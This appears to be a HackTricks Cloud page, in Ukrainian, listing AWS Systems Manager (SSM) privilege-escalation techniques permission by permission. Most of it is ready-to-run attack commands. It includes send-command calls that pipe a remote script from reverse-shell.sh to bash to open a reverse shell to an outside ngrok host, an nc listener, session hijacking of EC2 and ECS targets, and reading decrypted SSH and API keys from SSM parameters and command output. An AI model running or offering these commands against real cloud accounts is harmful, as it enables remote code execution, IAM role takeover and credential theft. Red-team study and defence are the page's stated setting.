AWS - SSM Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

SSM

Для отримання додаткової інформації про SSM перегляньте:

`ssm:SendCommand`

Атакуючий з дозволом ssm:SendCommand може виконувати команди в екземплярах, що працюють з Amazon SSM Agent, і компрометувати IAM Role, що працює всередині нього.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

У випадку, якщо ви використовуєте цю техніку для ескалації привілеїв всередині вже скомпрометованого EC2 екземпляра, ви можете просто захопити rev shell локально за допомогою:

# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Потенційний вплив: Пряме підвищення привілеїв до IAM ролей EC2, прикріплених до запущених екземплярів з працюючими SSM агентами.

`ssm:StartSession`

Зловмисник з дозволом ssm:StartSession може розпочати сесію, подібну до SSH, в екземплярах, що працюють з Amazon SSM Agent, і скомпрометувати IAM роль, що працює всередині неї.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

Щоб почати сесію, вам потрібно встановити SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Потенційний вплив: Пряме підвищення привілеїв до IAM ролей EC2, прикріплених до запущених екземплярів з працюючими SSM Agents.

Підвищення привілеїв до ECS

Коли ECS завдання виконуються з увімкненим ExecuteCommand, користувачі з достатніми правами можуть використовувати ecs execute-command, щоб виконати команду всередині контейнера. Згідно з документацією, це робиться шляхом створення безпечного каналу між пристроєм, який ви використовуєте для ініціювання команди “exec“, та цільовим контейнером за допомогою SSM Session Manager. (Необхідний плагін SSM Session Manager для цього) Отже, користувачі з ssm:StartSession зможуть отримати оболонку всередині ECS завдань з увімкненою цією опцією, просто виконавши:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Potential Impact: Пряме підвищення привілеїв до ECS IAM ролей, прикріплених до запущених завдань з увімкненим ExecuteCommand.

`ssm:ResumeSession`

Зловмисник з дозволом ssm:ResumeSession може повторно розпочати сесію, схожу на SSH, на екземплярах, що виконують Amazon SSM Agent з відключеним станом сесії SSM та компрометувати IAM роль, що виконується всередині неї.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Потенційний вплив: Пряме підвищення привілеїв до IAM ролей EC2, прикріплених до запущених екземплярів з працюючими SSM агентами та відключеними сесіями.

`ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)

Зловмисник з вказаними дозволами зможе перерахувати SSM параметри та читати їх у відкритому вигляді. У цих параметрах ви часто можете знайти чутливу інформацію, таку як SSH ключі або API ключі.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Потенційний вплив: Знайти чутливу інформацію всередині параметрів.

`ssm:ListCommands`

Зловмисник з цим дозволом може перерахувати всі команди, надіслані, і, сподіваючись, знайти чутливу інформацію в них.

aws ssm list-commands

Потенційний вплив: Знайти чутливу інформацію всередині командних рядків.

`ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)

Зловмисник з цими дозволами може перерахувати всі команди, що були надіслані, та прочитати вихідні дані, сподіваючись знайти чутливу інформацію в них.

# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Потенційний вплив: Знайти чутливу інформацію всередині виходу командних рядків.

Codebuild

Ви також можете використовувати SSM, щоб потрапити всередину проекту codebuild, що будується:

Підтримати HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousAWS - Secrets Manager Privesc NextAWS - Step Functions Privesc

Last updated 3 days ago

SSM

ssm:SendCommand

ssm:StartSession

Підвищення привілеїв до ECS

ssm:ResumeSession

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

ssm:ListCommands

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Codebuild

SSM

ssm:SendCommand

ssm:StartSession

Підвищення привілеїв до ECS

ssm:ResumeSession

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

ssm:ListCommands

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Codebuild

`ssm:SendCommand`

`ssm:StartSession`

`ssm:ResumeSession`

`ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)

`ssm:ListCommands`

`ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)

`ssm:SendCommand`

`ssm:StartSession`

`ssm:ResumeSession`

`ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)

`ssm:ListCommands`

`ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)